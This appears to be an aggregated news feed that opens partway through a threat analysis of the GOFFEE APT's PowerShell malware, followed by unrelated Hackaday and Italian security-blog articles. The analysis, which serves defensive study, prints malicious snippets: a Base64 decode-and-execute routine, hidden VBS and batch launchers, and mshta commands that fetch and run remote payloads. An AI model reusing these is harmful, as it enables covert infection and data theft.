<Module>ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9I...</Module>
There is an additional, previously undescribed function in PowerModul, named “OfflineWorker()”. It decodes a predefined string and executes its contents. In the instance shown in the screenshots above, the string to be decoded is empty, and therefore, nothing is executed. However, we have observed cases where the string contained content. An example of the OfflineWorker() function containing the FlashFileGrabber data stealing tool code is shown below:
function OfflineWorker() {
try{
$___offlineFlash = 'ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9IE…….=';

if($___offlineFlash -ne ''){
$___flashOfflineDecoded = FromBase64 $___offlineFlash;
Invoke-Expression($___flashOfflineDecoded);
}
}
catch{}
}
The payloads used by PowerModul include the PowerTaskel, FlashFileGrabber, and USB Worm tools.

FlashFileGrabber

As its name suggests, FlashFileGrabber is designed to steal files from removable media, such as flash drives. We have identified two variants: FlashFileGrabber and FlashFileGrabberOffline.

FlashFileGrabberOffline main routine

FlashFileGrabberOffline searches removable media for files with specific extensions, and when found, copies them to the local disk. To accomplish this, it creates a series of subdirectories in the TEMP folder, following the template “%TEMP%\CacheStore\connect\<VolumeSerialNumber>\”. The folder names “CacheStore” and “connect” are hardcoded within the script. Examples of such paths are provided below:
%TEMP%\CacheStore\connect\62431103\2024\some.pdf
%TEMP%\CacheStore\connect\62431103\Documents\some.docx
%TEMP%\CacheStore\connect\62431103\attachment.jpg
%TEMP%\CacheStore\connect\6c1d1372\Print\resume.docx
Additionally, a file named “ftree.db” is created at the path specified in the template, which stores metadata for the copied files, including the full path to the original file, its size, and dates of last access and modification. Furthermore, in the “%AppData%” folder, the “internal_profiles.db” file is created, storing the MD5 sums of the aforementioned metadata. This allows the malware to avoid copying the same files more than once:
%TEMP%\CacheStore\connect\<VolumeSerialNumber>\ftree.db
%AppData%\internal_profiles.db
The list of file extensions of interest is as follows:

FlashFileGrabber largely duplicates the functionality of FlashFileGrabberOffline, but with one key difference: it is capable of sending files to the C2 server.

FlashFileGrabber’s routines

USB Worm

USB Worm is capable of infecting removable media with a copy of PowerModul. To achieve this, the worm renames the files on the removable disk with a random name, retaining their original extension, and assigns them the “Hidden” file attribute. The “UserCache.ini” file, which contains PowerModul, is then copied to the folder with the original file.

USB Worm main routine

Additionally, the worm creates hidden VBS and batch files to launch PowerModul and open a decoy document.

CreateVBSFile() and CreateBatFile() functions

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run Chr(34) & ".\zermndzg.bat" & Chr(34), 0, False
WshShell.Run Chr(34) & ".\zermndzg.docx" & Chr(34), 1, False
Set WshShell = Nothing
Example of the contents of a malicious VBS
powershell -exec bypass -windowstyle hidden -nop -c "$raw= [io.file]::ReadAllText(""".\UserCache.ini"""); iex $raw;"
Example of the contents of a malicious batch file

A shortcut is also created with the original name of the decoy document, which, when launched, executes the VBS file.

CreateShortcutForFile() function

To disguise the shortcut, the worm assigns an icon from the shell32.dll library, depending on the extension of the original file. The worm limits the number of documents replaced with shortcuts to five, selecting only the most recently accessed files by sorting them according to their LastAccessTime attribute.

System infection scheme via removable media

PowerTaskel

We have dubbed the non-public PowerShell Mythic agent delivered via a mail-based infection chain since early 2023, as PowerTaskel. This implant possesses only two primary capabilities: sending information about the targeted environment to a C2 server in the form of a “checkin” message, and executing arbitrary PowerShell scripts and commands received from the C2 server as “tasks” in response to “get_tasking” requests from the implant. The request payloads are PowerShell objects that are serialized to XML, encoded using XOR with a sample-specific 1-byte key, and then converted to Base64.

Based on the naming and ordering of the configuration parameters, it is likely that PowerTaskel is derived from the open-source Medusa Mythic agent, which was originally written in Python.

Comparison of Medusa and PowerTaskel configuration code

Comparison of Medusa and PowerTaskel “checkin” function code

PowerTaskel is a fully functional agent capable of executing commands and PowerShell scripts, which expand its capabilities to downloading and uploading files, running processes, etc. However, its functionality is often insufficient due to specific aspects of PowerShell usage, prompting the group to switch to a custom binary Mythic agent. To achieve this, PowerTaskel loads the Mythic agent from the C2 server, injects it into its own process memory, and runs it in a separate thread. In this scenario, the Mythic agent is present as a self-configuring x32/x64 shellcode. The method of injecting and loading the Mythic agent shellcode is described in more detail in the “Lateral Movement” section.

In at least one instance, PowerTaskel received a script containing a FolderFileGrabber component as a task. FolderFileGrabber largely replicates the functionality of FlashFileGrabber, with one key difference: it can grab files from remote systems via a hardcoded network path using the SMB protocol. The PowerShell cmdlet “New-SmbMapping” is used to access remote system resources, enabling successful retrieval of the desired files.

Lateral movement

Following system infection, if the user account permissions allow it, PowerTaskel performs several tasks to elevate its privileges to the System level. To achieve this, PowerTaskel utilizes the PsExec utility, which is part of the Sysinternals suite. The PsExec utility is dropped into the current directory where PowerTaskel is located and is used to execute mshta.exe with system privileges, passing a URL as an argument.

The images below depict two tasks that PowerTaskel executes with its C2 server. The first task checks for the presence of the file “ntuser.exe” in the %ProgramData% directory, and if it is not found, downloads it from the C2 server. The second task runs mshta.exe via ntuser.exe, which is actually a renamed PsExec utility.

Getting “ntuser.exe”

The “ntuser.exe” executable running “mshta.exe”

The next image illustrates an example of the execution flow of various scripts and commands started with the privilege elevation procedure. The executable file “1cv9.exe” is a renamed PsExec utility, and the argument “-s” specifies that the process it launches should run under the System account. The launched program “mshta.exe” accepts a URL as an argument, which points to an HTA file containing malicious, obfuscated JScript. The HTA file is cached and saved to the InetCache folder. This JScript creates two files, “desktop.js” and “user.txt”, on the disk using the “echo” console command with output redirection to a file, and then executes desktop.js via cscript.exe. The desktop.js file, in turn, launches the interpreter with a script on the command line, which reads the contents of user.txt and executes it. As evident from the contents passed to the “echo” command, user.txt is another PowerShell script whose task is to extract a payload from a hardcoded address and execute it. In this case, the payload is PowerTaskel, which now runs with the elevated privileges.

Example of execution flow on an infected system

Once launched, PowerTaskel interacts with its C2 server and executes standard commands to gather information about the system and environment. Notably, the launch of csc.exe (Visual C# Command Line Compiler) indicates that PowerTaskel has received a task to load a shellcode, which it accomplishes using an auxiliary DLL. The primary function of this DLL is to copy the shellcode into allocated memory. In our case, the shellcode is self-configuring code for the binary Mythic agent.

The final line of the execution flow (“hxxp://192.168.1[.]2:5985/wsman”) reveals a call to the WinRM (Microsoft Windows Remote Management) service, located on a remote host on the local network, via the loaded Mythic agent. A specific User-Agent header value, “Ruby WinRM Client”, is used to access the WinRM service.

HTTP header for WinRM request

The WinRM service is actively utilized by GOFFEE for network distribution purposes. Typically, this involves launching the mshta.exe utility on the remote host with a URL as an argument. The following examples illustrate the execution chains observed on remote hosts:
wmiprvse.exe -secured -Embedding
-> cmd.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wsmprovhost.exe
-> mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> cmd.exe /Q /c powershell.exe mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> powershell.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta
Recently, we have observed that GOFFEE is increasingly abandoning the use of PowerTaskel in favor of the binary Mythic agent during lateral movement.

Mythic agent HTA

The mshta.exe utility is still employed to launch the binary Mythic agent, with a URL passed as an argument. However, the payload contents for the passed URL differ from the traditional HTA format. It is relatively large, approximately 180 kilobytes, and is characterized as a polyglot file, which is a type of file that can be validly interpreted in multiple formats. The shellcode containing the Mythic agent is located at the beginning of the file and occupies approximately 80% of its size. It is followed by two Base64-encoded PowerShell scripts, separated by a regular line break, and finally, the HTA file itself.

Polyglot payload

When the mshta.exe utility downloads the aforementioned payload, it interprets it as an HTA file and transfers control to an obfuscated JScript embedded within the HTA section of the polyglot file. The script first determines the argument used to launch the mshta.exe utility, whether it was a URL or a path to a local file. If a URL was used as the argument, the script searches for the original HTA file in the InetCache folder, where the system cached the HTA file during download. To do this, the script iterates through all files in the cache folder and checks their contents for the presence of a specific magic string.

Deobfuscated JScript from the HTA section of the payload

If an HTA file is found on the disk, the script drops two files, “settings.js” and “settings.ps1”, using the “echo” command, and then runs settings.js with additional command-line arguments. The script then sets a timer for 10 seconds, after which the dropped files will be deleted.

Deobfuscated “settings.js”

The running settings.js script accepts three command-line arguments: the path to powershell.exe, the path to the HTA file, and the string “Shell.Application”. These received arguments are used to populate a PowerShell script, the contents of which are then passed to the powershell.exe command line.
powershell.exe -c "$INbqDKHp = \"C:\\\\Users\\\\[username]\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\duplicate````[1````].hta\";$OdfUfjp = get-content $env:USERPROFILE\\settings.ps1;$KWfWXqek=1;Invoke-Expression $OdfUfjp;$KWfWXqek=2;Invoke-Expression $OdfUfjp;$KWfWXqek=3;Invoke-Expression $OdfUfjp;"
The script passed to the PowerShell interpreter declares two variables: “$INbqDKHp”, which stores the path to the HTA file, and “$KWfWXqek”, a counter. The script then reads the contents of “settings.ps1” and executes it three times, passing the path to the HTA file and the counter as arguments, and incrementing the value of the “$KWfWXqek” variable by 1 each time.

Deobfuscated “settings.ps1”

During each execution, the “settings.ps1” script reads the contents of the HTA file, splits it into lines, and identifies Base64-encoded scripts. To detect these scripts, it first locates the line containing the HTA application tag by searching for the substring “<HTA:APPLICATION”. The three lines preceding this tag contain Base64-encoded scripts. Depending on the value of the “$KWfWXqek” counter, the script executes the corresponding Base64-encoded script.
The first two scripts are used to declare auxiliary functions, including compiling a helper DLL, which is necessary for executing the shellcode. The third script is responsible for allocating memory, loading the shellcode from the HTA file (whose path is retrieved from the previously defined “$INbqDKHp” variable), and transferring control to the loaded shellcode, which is the self-configuring code of the Mythic agent.

Victims

According to our telemetry, the identified targets of the malicious activities described in this article are located in Russia, with observed activity spanning from July 2024 to December 2024. The targeted industries are diverse, encompassing organizations in the mass media and telecommunications sectors, construction, government entities, and energy companies.

Attribution

In this campaign, the attacker utilized PowerTaskel, which had previously been linked to the GOFFEE group. Additionally, HTA files and various scripts were employed in the infection chain.

The malicious executable attached to the spear phishing email is a patched version of explorer.exe, similar to what we observed in GOFFEE’s attacks earlier in 2024, and contains shellcode that is very similar to the one previously used by GOFFEE.

Considering the same victimology, we can attribute this campaign to GOFFEE with a high degree of confidence.

Conclusions

Despite using similar tools and techniques, GOFFEE introduced several notable changes in this campaign.

For the first time, they employed Word documents with malicious VBA scripts for initial infection. Additionally, GOFFEE utilized a new PowerShell script downloader, PowerModul, to download PowerTaskel, FlashFileGrabber, and USB Worm. They also began using the binary Mythic agent, and likely developed their own implementations in PowerShell and C.

While GOFFEE continues to refine their existing tools and introduce new ones, these changes are not significant enough to suggest that they can be confused with another actor.

securelist.com/goffee-apt-new-…

The tech press has been full of announcements over the last day or two regarding GPMI. It’s a new standard with the backing of a range of Chinese hardware companies, for a high-speed digital video interface to rival HDMI. The Chinese semiconductor company HiSilicon have a whitepaper on the subject (Chinese language, Google Translate link), promising a tremendously higher data rate than HDMI, power delivery well exceeding that of USB-C, and interestingly, bi-directional data transfer. Is HDMI dead? Probably not, but the next few years will bring us some interesting hardware as they respond to this upstart.

Reading through pages of marketing from all over the web on this topic, it appears to be an early part of the push for 8k video content. There’s a small part of us that wonders just how far we can push display resolution beyond that of our eyes without it becoming just a marketing gimmick, but it is true to say that there is demand for higher-bandwidth interfaces. Reports mention two plug styles: a GPMI-specific one and a USB-C one. We expect the latter to naturally dominate. In terms of adoption, though, and whether users might find themselves left behind with the wrong interface, we would expect that far from needing to buy new equipment, we’ll find that support comes gradually with fallback to existing standards such as DisplayPort over USB-C, such that we hardly notice the transition.

Nearly a decade ago we marked the passing of VGA. We don’t expect to be doing the same for HDMI any time soon in the light of GPMI.

hackaday.com/2025/04/10/everyo…

Un’interruzione di carattere globale ha impedito agli amministratori di accedere a Exchange Admin Center (EAC). Il problema è stato messo immediatamente sotto indagine da parte di Microsoft. Da quando è avvenuta l’interruzione nella giornata di ieri, gli amministratori IT interessati hanno segnalato errori HTTP 500 quando tentavano di accedere al portale dell’interfaccia di amministrazione di Exchange.

Microsoft ha riportato che il problema è critico, il quale è stato portato all’attenzione con il bollettino EX1051697 relativo all’Interfaccia di amministrazione di Microsoft 365. Tuttavia, come suggerito anche da Microsoft, alcuni amministratori sono riusciti ad accedere al centro di amministrazione tramite la url admin.cloud.microsoft/exchange…

Microsoft ha affermato quanto segue: “Abbiamo identificato un aumento dei picchi di errore e stiamo indagando ulteriormente. Inoltre, stiamo esaminando le recenti modifiche apportate al servizio come possibile causa principale”. In un successivo aggiornamento del centro messaggi, Redmond ha affermato che i suoi ingegneri hanno riprodotto internamente il problema e raccolto ulteriori dati diagnostici per agevolare il processo di risoluzione dei problemi.

Per far fronte a questo problema, Microsoft ha iniziato a reindirizzare automaticamente gli amministratori all’URL funzionante come soluzione alternativa temporanea. Successivamente Microsoft ha riportato quanto segue: “Abbiamo identificato un potenziale problema di autenticazione in un percorso URL specifico e stiamo lavorando per mitigare il problema reindirizzando il traffico URL interessato a un URL funzionante”, ha affermato l’azienda in un aggiornamento dell’Interfaccia di amministrazione di Microsoft 365.

Al momento il problema è stato sanato da Microsoft e il servizio ha ripreso a funzionare regolarmente.

L'articolo HTTP 500 su Exchange Admin Center: blackout mondiale, amministratori bloccati! proviene da il blog della sicurezza informatica.

Se ti violano la password, cambi la password. Se ti violano l’impronta digitale, non puoi cambiare il dito.

Fatta questa doverosa premessa, l’autenticazione biometrica sta sostituendo attivamente le password e i codici PIN tradizionali, offrendo un metodo più comodo e, come comunemente si ritiene e affidabile per confermare l’identità. Le impronte digitali, i tratti del viso, la voce e perfino la forma delle orecchie sono diventati parte del moderno panorama digitale.

Tuttavia, la rapida diffusione di tali tecnologie non è stata priva di conseguenze: oltre alla comodità, è aumentato anche il livello di abuso. L’interesse criminale per la biometria non è più ipotetico: i criminali sfruttano sempre più le sue vulnerabilità in attacchi reali.

Secondo i dati di Europol, il numero di casi legati all’inganno dei sistemi biometrici è aumentato in modo significativo. L’attenzione principale degli aggressori è rivolta ai cosiddetti attacchi di presentazione. La loro essenza è la falsificazione o l’imitazione delle caratteristiche biometriche allo scopo di ingannare il sistema di autenticazione.

Un esempio semplice potrebbe essere una replica in silicone di un’impronta digitale realizzata a partire da una fotografia o da un campione fisico. Tali falsi possono essere realizzati in casa utilizzando materiali facilmente reperibili; le moderne stampanti 3D consentono di creare repliche ancora più precise.

Anche i sistemi di riconoscimento facciale si stanno rivelando vulnerabili. I criminali utilizzano maschere in silicone, trucco, algoritmi di morphing software e tecnologie deepfake. Questi ultimi consentono non solo di modificare l’immagine, ma anche di sintetizzare la voce, imitando il discorso di una determinata persona.

Tali metodi vengono utilizzati attivamente per aggirare i sistemi di sicurezza, anche nei servizi bancari e governativi. Ad esempio, si sono verificati casi in cui i deepfake sono stati utilizzati per aggirare l’identificazione nei sistemi di servizi remoti. Come osserva Europol, il vettore dell’abuso non è più limitato alla falsificazione dei dati. Ciò include anche l’estrazione di profili biometrici che possono essere utilizzati a fini di tracciamento, ricatto o addirittura monitoraggio di massa.

Le tecnologie progettate per rafforzare la sicurezza si trasformano in un mezzo di attacco nelle mani dei criminali. Inoltre, una volta compromessi, i dati biometrici non possono essere sostituiti: a differenza di una password, un’impronta digitale o la forma del viso rimangono invariate per tutta la vita.

Per contrastare le nuove minacce Le forze dell’ordine devono andare oltre la risposta tradizionale. Europol sottolinea l’importanza di una stretta collaborazione con ricercatori ed esperti di sicurezza. Lavorando insieme possiamo non solo prevedere i vettori di attacco, ma anche implementare rapidamente misure di protezione. Ciò include il monitoraggio delle minacce, gli aggiornamenti tempestivi degli algoritmi e l’etichettatura e l’analisi obbligatorie degli incidenti correlati all’aggiramento dei sistemi biometrici.

Si propone di prestare particolare attenzione alla sensibilizzazione degli agenti di polizia, degli esperti investigativi e degli specialisti tecnici. Comprendere le specificità degli attacchi biometrici, essere in grado di riconoscere le tracce del loro utilizzo ed essere in grado di lavorare con i dati biometrici durante le indagini sta diventando di fondamentale importanza. Non si tratta solo di proteggere i sistemi, ma anche della qualificazione giuridica di tali reati, che è ancora ben lungi dall’essere perfetta.

Il rapporto di Europol sottolinea che senza una risposta adeguata da parte delle forze dell’ordine, la società rischia di perdere fiducia nella biometria come tecnologia del futuro. In un contesto in cui la criminalità informatica sta raggiungendo nuovi livelli, non servono solo soluzioni tecniche, ma anche l’elaborazione di una strategia chiara che unisca gli sforzi dello Stato, delle imprese e della comunità scientifica. Questo è l’unico modo per mantenere l’equilibrio tra sicurezza e praticità, che era originariamente al centro degli sviluppi biometrici.

L'articolo Il Mito della Biometria Sicura! La Verità Shock sui Nuovi Attacchi Digitali proviene da il blog della sicurezza informatica.

Normally, videos over at The Signal Path channel on YouTube have a certain vibe, namely teardowns and deep dives into high-end test equipment for the microwave realm. And while we always love to see that kind of content, this hop into the world of cryogenics and liquid oxygen production shows that [Shahriar] has other interests, too.

Of course, to make liquid oxygen, one must first have oxygen. While it would be easy enough to get a tank of the stuff from a gas supplier, where’s the fun in that? So [Shahriar] started his quest with a cheap-ish off-the-shelf oxygen concentrator, one that uses the pressure-swing adsorption cycle we saw used to great effect with DIY O₂ concentrators in the early days of the pandemic. Although analysis of the machine’s output revealed it wasn’t quite as capable as advertised, it still put out enough reasonably pure oxygen for the job at hand.

The next step in making liquid oxygen is cooling it, and for that job [Shahriar] turned to the cryocooler from a superconducting RF filter, a toy we’re keen to see more about in the future. For now, he was able to harvest the Stirling-cycle cryocooler and rig it up in a test stand with ample forced-air cooling for the heat rejection end and a manifold to supply a constant flow of oxygen from the concentrator. Strategically placed diodes were used to monitor the temperature at the cold end, a technique we can’t recall seeing before. Once powered up, the cryocooler got down to the 77 Kelvin range quite quickly, and within an hour, [Shahriar] had at least a hundred milliliters of lovely pale blue fluid that passed all the usual tests.

While we’ve seen a few attempts to make liquid nitrogen before, this might be the first time we’ve seen anyone make liquid oxygen. Hats off to [Shahriar] for the effort.

youtube.com/embed/kakZ_fhfUHU?…

hackaday.com/2025/04/09/making…

Vibe coding is the buzzword of the moment. What is it? The practice of writing software by describing the problem to an AI large language model and using the code it generates. It’s not quite as simple as just letting the AI do your work for you because the developer is supposed to spend time honing and testing the result, and its proponents claim it gives a much more interactive and less tedious coding experience. Here at Hackaday, we are pleased to see the rest of the world catch up, because back in 2023, we were the first mainstream hardware hacking news website to embrace it, to deal with a breakfast-related emergency.

Jokes aside, though, the fad for vibe coding is something which should be taken seriously, because it’s seemingly being used in enough places that vibe coded software will inevitably affect our lives. So here’s the Ask Hackaday: is this a clever and useful tool for making better software more quickly, or a dangerous tool for creating software nobody quite understands, containing bugs which could cause a disaster?

Our approach to writing software has always been one of incrementally building something from the ground up, which satisfies the need. Readers will know that feeling of being in touch with how a project works at all levels, with a nose for immediately diagnosing any problems that might occur. If an AI writes the code for us, the feeling is that we might lose that connection, and inevitably this will lead to less experienced coders quickly getting out of their depth. Is this pessimism, or the grizzled voice of experience? We’d love to know your views in the comments. Are our new AI overlords the new senior developers? Or are they the worst summer interns ever?

hackaday.com/2025/04/09/ask-ha…

[BorisDigital] was mesmerised by a modern elevator. He decided to see how hard it would be to design his own elevator based on Raspberry Pis. He started out with a panel for the elevator and a call panel for the elevator lobby. Of course, he would really need three call panels since he is pretending to have a three-floor building.

It all looks very professional, and he has lots of bells and whistles, including an actual alarm. With the control system perfected, it was time to think about the hydraulics and mechanical parts to make a door and an actual lift.

It is still just a model, but he does have 10A AC switches for the pumps. Everything talks via MQTT over WiFi. There’s also a web-based control dashboard. We didn’t count how many Pi boards are in the whole system, but it is definitely more than three.

If you are wondering why this was built, we are too. But then again, we never really need an excuse to go off on some project, so we can’t throw stones.

Want to see a more practical build? Check it out. Perhaps he’ll start on an escalator next.

youtube.com/embed/eTpAalJFUlY?…

hackaday.com/2025/04/09/going-…

This week, Jonathan Bennett and Rob Campbell talk to Stéphane Graber about LXC, Linux Containers, and Incus! Why did Incus fork from LXD, why are Fortune 500 companies embracing it, and why might it make sense for your home lab setup? Watch to find out!

• stgraber.org/feed/
• Incus: linuxcontainers.org/incus
• Online demo: linuxcontainers.org/incus/try-…
• github.com/lxc/incus
• Incus Deploy: github.com/lxc/incus-deploy
• Incus OS: github.com/lxc/incus-os
• Terraform Provider: github.com/lxc/terraform-provi…
• Migration Manager: github.com/futurfusion/migrati…

youtube.com/embed/tiS7QU4ABnY?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/04/09/floss-…

The phones most of us carry around in our pockets every day hold a surprising amount of computing power. It’s somewhat taken for granted now that we can get broadband in our hands in most places; so much so that when one of these devices has reached the end of its life it’s often just tossed in a junk drawer even though its capabilities would have been miraculous only 20 years ago. But those old phones can still be put to good use though, and [Denys] puts a few of them back to work running a computing cluster.

Perhaps the most significant flaw of smartphones, though, is that most of them are locked down so much by their manufacturers that it’s impossible to load new operating systems on them. For this project you’ll need to be lucky enough (or informed enough) to have a phone with an unlockable bootloader so that a smartphone-oriented Linux distribution called postmarketOS can be installed. With this nearly full-fledged Linux distribution to work from, the phones can be accessed by ssh and then used to run Kubernetes for the computing cluster. [Denys] has three phones in his cluster that run a few self-hosted services for him.

[Denys] also points out in his guide that having a phone that can run postmarketOS might save some money when compared to buying a Raspberry Pi to run the same service, and the phones themselves can often be more powerful as well. This is actually something that a few others have noted in the past as well. He’s gone into a considerable amount of detail on how to set this up, so if you have a few old smartphones gathering dust, or even those with broken screens or other physical problems where the underlying computing resources are still usable, it’s a great way to put these machines back to work.

Thanks to [mastro Gippo] for the tip!

hackaday.com/2025/04/09/self-h…

Ever wanted your own X-ray machine? Of course you have! Many of us were indoctrinated with enticing ads for X-ray specs and if you like to see what’s inside things, what’s better than a machine that looks inside things? [Hyperspace Pirate] agrees, and he shows you the dangers of having your own X-ray machine in the video below.

The project starts with an X-ray tube and a high voltage supply. The tube takes around 70,000 volts which means you need a pretty stout supply, an interesting 3D printed resistor, and some mineral oil.

The output display? A normal camera. You also need an intensifying screen, which is just a screen with phosphor or something similar. He eventually puts everything in lead and reminds you that this is a very dangerous project and you should probably skip it unless you are certain you know how to deal with X-ray dangers.

Overall, looks like a fun project. But if you want real credit, do like [Harry Simmons] and blow your own X-ray tube, too. We see people build similar machines from time to time. You shouldn’t, but if you do, remember to be careful and to tell us about it!

youtube.com/embed/4NRkFqeO27Y?…

hackaday.com/2025/04/09/you-sh…

The first Philadelphia Maker Faire was extremely impressive, and seemed poised to be one of the premier maker events on the East Coast. Unfortunately, it had the misfortune of happening just a few months before COVID-19 made such events impossible. Robbed of all its momentum, the event tried out different venues after the shadow of the pandemic was gone, but struggled to meet the high bar set by that inaugural outing.

But after attending the the 2025 Philadelphia Maker Faire this past weekend, I can confidently say the organizers have moved the needle forward. This year marks the second time the event has been held at the Cherry Street Pier, a mixed-use public space with an artistic bent that not only lends itself perfectly to the spirit of Maker Faire but offers room for expansion in the future. The pier was packed with fascinating exhibits and excited attendees, and when the dust settled, everyone I spoke to was thrilled with how the day went and felt extremely positive about the future of the Faire.

Providing coverage of an event like this is always difficult, as there’s simply no way I could adequately describe everything there was to see and do. The following represents just a few of the projects that caught my eye; to see all that the Philadelphia Maker Faire has to offer, I’d strongly suggest you make the trip out in 2026.

Wasteworld Toys

Of all the awesome projects I saw during the Faire, the one that stuck with me the most has to be Brett Houser’s Wasteworld Toys. This incredible collection of hand-made remote controlled vehicles invoke the look and feel of the Mad Max universe, but are populated with its own cast of post-apocalyptic characters that come from the depths of Brett’s obviously considerable imagination.

Whether your saw them as pieces of art or electronic marvels, it was impossible not to be impressed with the work Brett put into these builds. While there were some 3D printed parts and cannibalized model kits, much of the raw material used to build the vehicles and characters came from the trash. Brett has an eye for repurposing everyday objects, like taking the metal top from a disposable lighter and turning it into an armored faceplate for one of his Wasteworld warriors.

Beyond being able to simply drive them around, most of the vehicles had some secondary function. One was equipped with an Airsoft cannon, another had a functional flame-thrower, and there was even a mobile rocket launcher that actually fired tiny rockets. They weren’t all weapons of war though: there was a surveillance van that featured a tiny display showing nearby WiFi networks, and a tricked-out station wagon that had an emulated version of Contra running in the back that you could play with a Bluetooth PlayStation controller.

Many of the vehicles featured first person view (FPV) capabilities, with the cameras so expertly hidden on the vehicles and cybernetic characters that at first glance you assume they’re just part of the visual theme and not functional components. To make the experience even more immersive, several vehicles featured displays that were really only visible when looking through the FPV gear, such as digital readouts of the system’s battery voltage.

As impressive as the vehicles of Wasteworld Toys was, it was perhaps Brett himself who left the biggest impression on me. Humble, affable, and eager to share the intricate details of his work, he was even willing to hand the controls of his creations over to attendees, much to their delight. The Wasteworld couldn’t have asked for a better ambassador.

Myelin BCI Board

Hackaday readers may recall the OpenBCI project, which made some headlines about a decade ago with their relatively low-cost development boards for experimenting with brain-computer interfaces (BCIs). We covered a few projects that used their software and hardware, including a flying shark controlled by EEG signals.

It turns out that OpenBCI has now turned their attention to some kind of mixed reality headset that costs as much as a new car, leaving the future of their more hobbyist friendly hardware in question. Which is why Mike Recine has been working on the Myelin, an open source hardware project that continues the legacy of OpenBCI’s early work. Powered by the ESP32, the battery-powered board can wirelessly link to your phone or computer to deliver 16 channels of EEG data.

Mike is hoping to launch a Kickstarter for the hardware soon, offering up assembled and ready-to-use Myelin boards. Kits are also on the horizon, and of course as an open source hardware project, spinning up your own board will be an option as well. The project doesn’t have much of an online presence currently, but interested parties can sign up to be notified when more information goes live.

A Cardboard Table Saw

The ChompSaw is advertised as a “kid-safe power tool for cutting cardboard” but it doesn’t take long to realize that’s selling the machine a bit short. There’s no blade in the machine, instead it uses a small metal piston to rapidly nibble away at the cardboard, a mechanism that co-founder Max Liechty says could be thought of as a “full-auto hole punch.” Even though there’s no blade, the business end of the ChompSaw is still under a protective cover that keeps anything thicker than 3 mm cardboard out. You couldn’t hurt yourself with this machine if you tried.

It rapidly rips through cardboard in any direction, making it easy to follow patterns and cut out complex shapes. Though it was designed primarily for common cardboard (think: all those Amazon boxes you’ve got stacked up), it can chew through other thin materials such as paper, foam, and plastic, opening up even more possibilities.

hackaday.com/wp-content/upload…

The ChompSaw brought in over $1 million during its 2023 Kickstarter campaign, and is available for purchase through their site. While it might not seem like the kind of machine we’d usually get excited about at Hackaday, its ability to cut through foam and other materials holds promise for more practical applications than rainy day arts and crafts. Plus, one should never underestimate the value of CAD: Cardboard Aided Design.

The Sights of Philly Maker Faire

The Road Ahead

In addition to the attendees and exhibitors, I also got the chance to talk to some of the folks behind the Philadelphia Maker Faire. It will probably come as no surprise to hear they all share a passion for discovering and showcasing local talent, and are very excited about the future of the event. There was even some talk about coordinating efforts with other art and tech events in the area such as JawnCon.

Considering they were up against some dreary weather, the organizers were encouraged by the fantastic turnout. Similarly, the venue itself was more than up to the challenge, and should have no trouble supporting the event as it grows. Put simply, the Philadelphia Maker Faire has found its stride, and promises to be even bigger and better next year. If you’re in the Northeast US, this is an event you should keep on your calendar for 2026 and beyond.

Un piccolo ufficio postale nello stato del Kentucky (USA) è diventato il punto di partenza di una delle più grandi operazioni segrete dell’FBI degli ultimi anni. Il 17 settembre 2021, una scatola conteneva quello che sembrava un normale pacco di libri per bambini, ma all’interno del libro c’erano buste contenenti migliaia di dollari in contanti.

Il denaro proveniva da una persona nota come ElonmuskWHM, uno dei principali riciclatori di denaro del darknet che lavorava sulla piattaforma White House Market. I suoi servizi venivano utilizzati da criminali che volevano incassare criptovalute senza passare attraverso piattaforme legali che richiedevano la verifica dell’identità. L’FBI decise non solo di catturarlo, ma anche di impossessarsi dei suoi affari, diventando così la “cassa” del mondo criminale.

Dietro ElonmuskWHM si celava il cittadino indiano trentenne, Anurag Pramod Murarka, che è stato attirato negli Stati Uniti tramite un visto approvato e arrestato all’aeroporto. E poi, per quasi un anno, gli agenti dell’FBI continuarono a condurre affari a suo nome. I clienti non avevano idea che stavano trasferendo criptovalute e ricevendo denaro in cambio di servizi organizzati dall’agenzia di intelligence, che registrava tutto, dagli indirizzi ai collegamenti con altri criminali.

L’operazione ha portato alla scoperta di spacciatori di droga a Miami, rapine a mano armata a San Francisco e hacker criminali, dietro gli attacchi multimilionari. Sotto le mentite spoglie di un ufficio di cambio, gli agenti hanno fatto molto più che limitarsi a osservare: hanno anche fornito denaro agli hacker affinché si rivelassero.

Uno di questi casi riguarda Remington Ogletree. Durante le indagini, ordinò 75.000 dollari tramite Telegram, senza sapere che lo “scambiatore” era già controllato dall’FBI. Il denaro gli è stato inviato con un numero di tracciamento USPS, che ha permesso di stabilire nuovi dettagli sulle sue attività. Ogletree venne successivamente arrestato, ma continuò a lavorare per quasi un anno, ignaro di essere sorvegliato.

Per raggiungere Murarka, gli agenti hanno analizzato la blockchain, cercato corrispondenze nelle domande di visto e utilizzato metodi più controversi. Ad esempio, l’FBI ha chiesto a Google i dati di tutti gli utenti che hanno guardato video di YouTube inviati a un sospettato tramite messaggio di testo, una mossa che ha suscitato critiche per la potenziale violazione dei diritti costituzionali.

Inoltre, gli agenti hanno rintracciato i mittenti del denaro a New York. Uno di loro, nome in codice “Eric“, divenne un informatore dell’FBI. Ha continuato a trasportare denaro contante sotto copertura, utilizzando una telecamera nascosta nel corpo, contribuendo così a identificare i partecipanti al raggiro. Da febbraio a settembre, Eric ha effettuato circa 80 consegne per un valore di oltre 15 milioni di dollari, raccogliendo nuove prove. Il denaro veniva trasportato attraverso negozi, parcheggi e ristoranti, da dove i muli viaggiavano attraverso gli stati.

Videoclip dalla telecamera dell’informatore (404 Media)

